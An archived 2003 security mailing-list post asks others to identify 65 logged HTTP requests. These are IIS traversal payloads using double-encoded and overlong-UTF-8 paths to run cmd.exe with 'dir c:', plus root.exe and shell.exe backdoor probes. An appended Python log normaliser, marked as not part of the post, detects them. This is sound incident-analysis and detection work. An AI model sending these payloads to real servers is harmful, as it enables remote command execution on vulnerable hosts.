Security Incidents mailing list archives

New attack or old Vulnerability Scanner?


From: Mark Embrich <mark_embrich () yahoo com>
Date: 24 Apr 2003 23:43:43 -0000



Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
Note that it also included "User-Agent:.Mozilla/3.0.(compatible;.Indy.Library)....",
which my googling tells me means this attack/scanner was probably built using the
Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses.
The first two were from a Comcast cable user.
The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0.      Scan TCP 80
1.      GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2.      GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3.      GET./_vti_bin/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4.      GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5.      GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6.      GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7.      GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8.      GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9.      GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10.     GET./_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11.     GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12.     GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13.     GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14.     GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15.     GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16.     GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17.     GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18.     GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19.     GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20.     GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21.     GET./msadc/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22.     GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23.     GET./msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24.     GET./MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25.     GET./msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26.     GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27.     GET./msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28.     GET./msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29.     GET./msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30.     GET./msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31.     GET./msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32.     GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33.     GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34.     GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35.     GET./PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36.     GET./PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37.     GET./PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38.     GET./PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39.     GET./Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40.     GET./Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41.     GET./Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42.     GET./Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43.     GET./samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44.     GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45.     GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46.     GET./scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47.     GET./scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48.     GET./scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49.     GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50.     GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51.     GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52.     GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53.     GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54.     GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55.     GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56.     GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57.     GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58.     GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59.     GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60.     GET./scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61.     GET./scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62.     GET./scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63.     GET./scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64.     GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65.     GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..
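As an added example (not part of Mark's post or of any tool named in it), a small Python normaliser for spotting this probe pattern in web logs: it decodes a request target the way the probes above expect the server to (repeated percent-decoding for the %25/%%35 forms, folding of overlong UTF-8 such as %c0%af and %c1%9c) and tags what survives; the sample targets are constructed from the request lines quoted above.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample targets modelled on the probes in the post ('.' placeholders dropped).
SAMPLE_TARGETS = [
    "/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:",               # %255c -> %5c -> '\'
    "/_vti_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:",  # %%35%63 -> %5c -> '\'
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:",          # overlong UTF-8 '/'
    "/scripts/root.exe?/c+dir+c:",                                   # leftover backdoor name
    "/images/logo%20final.png",                                      # benign single encoding
]
SUSPECT_EXES = ("cmd.exe", "root.exe", "shell.exe")  # executables the probes ask for

def fold_overlong_utf8(data: bytes) -> bytes:
    """Collapse multi-byte sequences whose value is ASCII (C0 AF -> '/', C1 9C -> '\\',
    E0 80 AF -> '/'); lenient like the decoder these probes targeted, real UTF-8 kept."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        n = 8 - (b ^ 0xFF).bit_length()          # leading 1 bits = declared sequence length
        step, value = 1, b                       # default: copy the byte through
        if 2 <= n <= 6 and i + n <= len(data):
            folded = b & (0x7F >> n)             # payload bits of the lead byte
            for c in data[i + 1:i + n]:
                folded = (folded << 6) | (c & 0x3F)
            if folded < 0x80:                    # overlong encoding of an ASCII byte
                step, value = n, folded
        out.append(value)
        i += step
    return bytes(out)

def normalize(target: str, max_rounds: int = 4):
    """Decode until stable.  Returns (path, rounds, overlong): rounds = decode passes
    that changed something (>1 means double encoding), overlong = a fold happened."""
    data, rounds, overlong = target.encode("latin-1", "replace"), 0, False
    for _ in range(max_rounds):
        unquoted = unquote_to_bytes(data)
        decoded = fold_overlong_utf8(unquoted)
        overlong = overlong or decoded != unquoted
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    return data.decode("latin-1").replace("\\", "/"), rounds, overlong

def classify(target: str) -> list:
    """Tags for one request target; an empty list means nothing suspicious."""
    path, rounds, overlong = normalize(target.split("?", 1)[0])
    tags = ["traversal"] if ".." in path.split("/") else []
    tags += ["double-encoded"] if rounds > 1 else []
    tags += ["overlong-utf8"] if overlong else []
    return tags + [e for e in SUSPECT_EXES if path.lower().endswith("/" + e)]
```

Run `classify()` over the request-target column of an access log; the probes in the post all come back with `traversal` plus an encoding tag or a bare backdoor name, while ordinary single-encoded paths come back empty.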
